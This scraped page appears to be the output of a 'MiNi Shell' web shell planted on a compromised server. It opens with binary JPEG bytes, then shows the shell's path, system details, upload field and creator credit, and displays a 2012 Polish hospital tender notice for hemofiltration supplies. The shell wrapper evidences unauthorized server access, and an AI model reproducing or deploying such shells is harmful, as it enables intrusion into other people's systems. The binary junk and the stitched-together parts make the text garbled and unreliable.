JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121222/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121222/526284-N-2012.html

<p class="kh_header"><b>Świnoujście: Dostawa materiałów eksploatacyjnych jednorazowego użytku oraz płynów niezbędnych do wykonywania ciągłych konwekcyjno-dyfuzyjnych terapii nerko zastępczych na bazie systemu Multifiltrate firmy 
FRESENIUS MEDICAL CARE</b><br>
<b>Numer ogłoszenia: 526284 - 2012; data zamieszczenia: 22.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej Szpital Miejski im. Jana Garduły , ul. Mieszka I 7, 72-600 Świnoujście, woj. zachodniopomorskie, tel. 091 3267 345, faks 091 3214174.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów eksploatacyjnych jednorazowego użytku oraz płynów niezbędnych do wykonywania ciągłych konwekcyjno-dyfuzyjnych terapii nerko zastępczych na bazie systemu Multifiltrate firmy 
FRESENIUS MEDICAL CARE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa do siedziby Zamawiającego w Świnoujściu przy ul. Mieszka I 7,  materiałów eksploatacyjnych jednorazowego użytku oraz płynów niezbędnych do wykonywania ciągłych konwekcyjno-dyfuzyjnych terapii nerko zastępczych na bazie systemu Multifiltrate firmy FRESENIUS Medica Care, zwanych dalej przedmiotem dostawy według  specyfikacji zapotrzebowania określającą jego rodzaj i ilość - Załącznik nr 1 do SIWZ. ( Pakiet Nr 1 i 2) 
CPV: 33.18.15.00- 33.18.15.10-0
Wymagana jest pełna kompatybilność materiałów oraz płynów z aparatem.
Na przedmiot zamówienia składają się :
Pakiet Nr 1 -  Materiały eksploatacyjne jednorazowego użytku:
1)	zestawy do ciągłej, wysokoobjętościowej żylno-żylnej hemofiltracji, składające się z jałowych, pakowanych osobno następujących elementów:
- hemofiltra z polisulfonową błoną półprzepuszczalną o powierzchni dyfuzyjnej 1,8 m2,
- kasety integrującej dreny krwi z drenem filtracyjnym wraz z akcesoriami do wypełniania i płukania układu,
- dwóch drenów substytutu, każdy z przyłączami wlotowymi typu Safe Lock, zbiornikiem podgrzewacza, zaworem zwrotnym i przyłączem wylotowym typu Luer (męski);
2) worki na filtrat 10 L z zaworem spustowym;
3) strzykawki 50 ml z gumowym tłokiem,;
4) igły plastikowe typu Spike o długości 72 mm ( opakowanie po 100 szt);
5) zestawy do ciągłej, żylno-żylnej hemofiltracji, składające się z jałowych, pakowanych osobno następujących elementów:
- hemofiltra z polisulfonową błoną półprzepuszczalną o powierzchni dyfuzyjnej 1,4 m2,
- kasety integrującej dreny krwi z drenem filtracyjnym wraz z akcesoriami do wypełniania i płukania układu,
- drenu substytutu  z przyłączami wlotowymi typu Safe Lock, zbiornikiem podgrzewacza, zaworem zwrotnym i przyłączem typu Luer (męski); 
6)  zestawy do ciągłej, żylno-żylnej hemodiafiltracji, składające się z jałowych, pakowanych osobno następujących elementów:
- hemofiltra z polisulfonową błoną półprzepuszczalną o powierzchni dyfuzyjnej 1,4 m2,
- kasety integrującej dreny krwi z drenem filtracyjnym wraz z akcesoriami do wypełniania i płukania układu,
- drenu substytutu  z przyłączami wlotowymi typu Safe Lock, zbiornikiem podgrzewacza, zaworem zwrotnym i przyłączem typu Luer (męski),
- drenu dializatu z przyłączmi wlotowymi typu Safe Lock, zbiornikiem podgrzewacza, zaworem wrotnym i przyłączem wylotowym typu Hansen;
7) rozdzielacz 2/4 -  umożliwiający podłączenie 4 worków płynu do hemofiltracji z drenem substytutu/dializatu;
8) dwuświatłowe silikonowe cewniki do hemofiltracji o średnicy 13,5 Fr lub 11,5 Fr w zestawach z zabezpieczeniem przed infuzja powietrza w kanale żylnym o długości 15cm/20 cm;
9) zestawy do ciągłej hemodializy z regionalną antykoagulacją cytrynianową, składające się z jałowych, pakowanych osobno następujących elementów :
- zmodyfikowanej kasety integrującej 5 drenów: tętniczy, żylny, filtratu, cytrynianu (z końcówką Safe Lock), roztworu wapnia z igłą Spike z napowietrzaczem,
- hemofiltra z plisulfonową błoną półprzepuszczalną o powierzchni dyfuzyjnej 1,8m2,
- drenu dializatu;
10) zestawy do ciągłej hemodiafiltracji z regionalną antykoagulacją cytrynianową, składające się z jałowych, pakowanych osobno elementów;                                                                                                                                             -zmodyfikowanej kasety integrującej 5 drenów: tętniczy, żylny, filtratu, cytrynianu(z końcówką Safe Lock), roztworu wapnia( z igłą, spike, z napowietrzaniem);                                                                                              - hemofiltratu z polisulfonową błoną półprzepuszczalną o pow. dyfuzyjnej 1.8 m2;                                                                      - drenu dializatu;                                                                                                                                                                                   - drenu substytutu.         
 Pakiet Nr 2 - Płyny                                                                                                                                             
1) płyn substytucyjny do hemofiltracji : 
- wodorowęglanowy płyn do hemofiltracji buforowany glukozą w stężeniu fizjologicznym 5,55 mmol na l o różnych stężeniach potasu,
- opakowanie - 5,0 litrowy worek dwukomorowy z wielowarstwowej folii bez PCV, połączenie zawartości komór musi być wykonalne przez ucisk na jedną z nich,
- worek powinien posiadać dwa porty do pobierania płynów (wylotowe): typu Luer Lock, typu Safe Lock oraz port z membraną do nakłucia w celu modyfikacji składu,
- skład elektrolitowy:
	*sód - 140 mmol na l,
	*potas - 0,2,3,4 mmol na l (w zależności od potrzeb),
	*wapń - 1,5 mmol na l,
	*magnez - 0,5 mmol na l,
	*dwuwęglany - 35 mmol na l,
	*chlorki - 109,111,112,113 mmol na l.
2) dializat Ci-Ca K2 w dwukomorowych workach 5,0 l - wodorowęglanowy dializat (wyrób medyczny) o składzie:
	*potas 2 mmol na l,
	*sód 133 mmol na l,
	*wapń 0 mmol na l ( bezwapniowy),
	*wodorowęglan 20 mmol na l.                                                                                                                          dializat  Ci-Ca K4 w dwukomorowych workach 5,0l -wodorowęglanowy dializat(wyrób medyczny) o składzie: *potas 4mmol na l,                                                                                                                                                                                                                                                                                            *sód 133 mmol na l,                                                                                                                                                                        *wapń 0 mmol na l,                                                                                                                                                                     *wodorowęglan 20 mmol na l.
3) 4% cytrynian sodu w workach 1000ml;                                                                                                               4) Dializat Ci-Ca K2i K4 Plus:                                                                                                                                             wodorowęglanowy dializat ( wyrób medyczny) o składzie:                                                                                                                      * potas2, 4 mmol na l                                                                                                                                                           * sód 133 mmol na l                                                                                                                                                                         * wapń 0 mmol na l  (bezwapniowy)                                                                                                                                              * wodorowęglan 20 mmol na l                                                                                                                                                                  * magnez 1.0 mmol na l                                                                                                                                                                              * fosforany 1.25 mmol na l                                                                                                                                                                                  w dwukomorowych workach 5.0 l .                                                                                                                                                    

Dostawa realizowana będzie partiami w okresie trwania umowy. W wykazie przedmiotu zamówienia  podano przewidywany zakres ilościowy dostaw,  ostateczny zakres  określą zamówienia szczegółowe składane w toku realizacji umowy. Ilości wskazane w Załączniku Nr 1 (Pakiet Nr 1 i 2) do SIWZ , zostały podane orientacyjnie i mogą ulec zmianie w zależności od rzeczywistych potrzeb Zamawiającego. Ilości zostały podane jedynie by ułatwić sporządzenie i skalkulowanie oferty. W trakcie realizacji niniejszej umowy Zamawiający zastrzega sobie prawo do zmiany zamawianych ilości w poszczególnych pozycjach pakietu, poprzez ich zwiększenie lub zmniejszenie do 30% w ramach danego pakietu, z tym jednak zastrzeżeniem, że nie zostanie przekroczona ogólna wartość danego pakietu wynikająca z oferty cenowej Wykonawcy i stanowiąca wartość umowy. W przypadku pozycji zawierających od 1-3 jednostek miary, Zamawiający zastrzega sobie prawo do zwiększenia tej pozycji o jedna jednostkę z zastrzeżeniem, że nie zostanie przekroczona ogólna wartość danego pakietu.
Wykonawca dostarczać będzie przedmiot dostawy bezpośrednio do Oddziału Anestezjologii i Intensywnej Terapii, I Pietro, pokój 1005 w siedzibie Zamawiającego.
Warunki dostawy przedmiotu dostawy określają załączone wzór umowy,  Załącznik  nr 3 do SIWZ.

Czas realizacji dostawy ustala się na okres 12 miesięcy od dnia podpisania umowy. 
Zamawiający upoważnia Wykonawcę do wystawiania faktur VAT w ramach zawartej umowy bez podpisu swego przedstawiciela..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.18.15.00-0, 33.18.15.10-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą: spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach złożonych przez wykonawców.  Z załączonych dokumentów musi wynikać jednoznacznie, iż powyższe warunki wykonawca spełnił</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą: spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach złożonych przez wykonawców.  Z załączonych dokumentów musi wynikać jednoznacznie, iż powyższe warunki wykonawca spełnił</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-	formularz ofertowy z wykorzystaniem wzoru - Załącznik nr 2 do SIWZ
-	arkusz ilościowo -asortymentowo - cenowy z wykorzystaniem wzoru - Załącznik nr 1 do  SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający wymaga zawarcia umowy według wzoru stanowiącego Załącznik nr 3 do SIWZ. 
2. Strony na zasadzie art.144 ustawy Pzp ustalają, że każda istotna zmian umowy może nastąpić wg zasad i na warunkach określonych poniżej.
3. Zamawiający przewiduje możliwość dokonania zmiany umowy w następujących sytuacjach:
a.	Jeżeli nastąpiła zmiana danych podmiotów zawierających umowę ( np. w wyniku zmiany przekształceń, przejęć, itp.),
b.	W przypadku zmiany w mieniu Odbiorcy, które skutkować będą koniecznością skorygowania załączników do SIWZ lub zapisów umowy.
c.	Nastąpiła zmian nazwy handlowej oferowanego przedmiotu zamówienia,
d.	zmiany konfekcjonowania dotyczącą  pojemności lub ilości sztuk w opakowaniu przy nieprzekroczeniu ceny ofertowej
e.	wprowadzenia zamienników o takich samych parametrach o ile nie będą droższe niż cena ofertowa,
f.	w przypadku wygaśnięcia pozwolenia na sprzedaż lub wycofanie leku, wyrobu medycznego z produkcji, na inny o tych samych parametrach i cenie;
g.	wprowadzenia tańszego zamiennika o takich samych parametrach i niższej cenie;
h.	dopuszcza się zmianę ceny  w przypadku zaproponowania obniżki ceny ofertowej przez Wykonawcę.
i.	zmiany cen mogą także nastąpić  w wyniku zmiany stawki VAT  oraz jeżeli  przedmiot dostawy  zostanie obarczony obowiązkiem zapłacenia podatku, który nie obowiązywał w dniu podpisania umowy. Aneks powinien zawierać  uzasadnienie wraz z kalkulacją ceny
j.	zmiana jest nieistotna 
4.Odbiorca zastrzega sobie prawo do korzystania z czasowych bądź okresowych promocji wprowadzanych przez producenta lub Dostawcę. Ewentualne obniżki cen nie stanowią zmiany postanowień niniejszej umowy i nie wymagają zawarcia odrębnego aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-swinoujscie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , Szpital Miejski im. Jana Garduły, ul. Mieszka I 7, 72-600 Świnoujście.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.01.2013 godzina 13:00, miejsce: Sekretariat II piętro, pokój Nr 2010, SPZOZ Szpital Miejski, im. Jana Garduły, ul. Mieszka I 7, 72-600 Świnoujście.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com